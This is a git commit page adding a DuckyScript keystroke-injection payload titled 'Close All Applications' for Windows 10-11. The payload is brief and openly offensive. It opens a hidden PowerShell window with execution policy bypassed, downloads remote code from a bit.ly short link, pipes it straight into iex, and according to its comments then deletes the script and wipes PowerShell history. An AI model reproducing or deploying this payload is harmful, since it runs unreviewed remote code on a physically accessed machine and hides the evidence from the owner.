Create payload.txt

pull/213/head
Alessandro 2023-01-12 17:21:40 +01:00 committed by GitHub
parent 9d5c8caca6
commit 0e6904c3b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass;irm bit.ly/CloseApplications | iex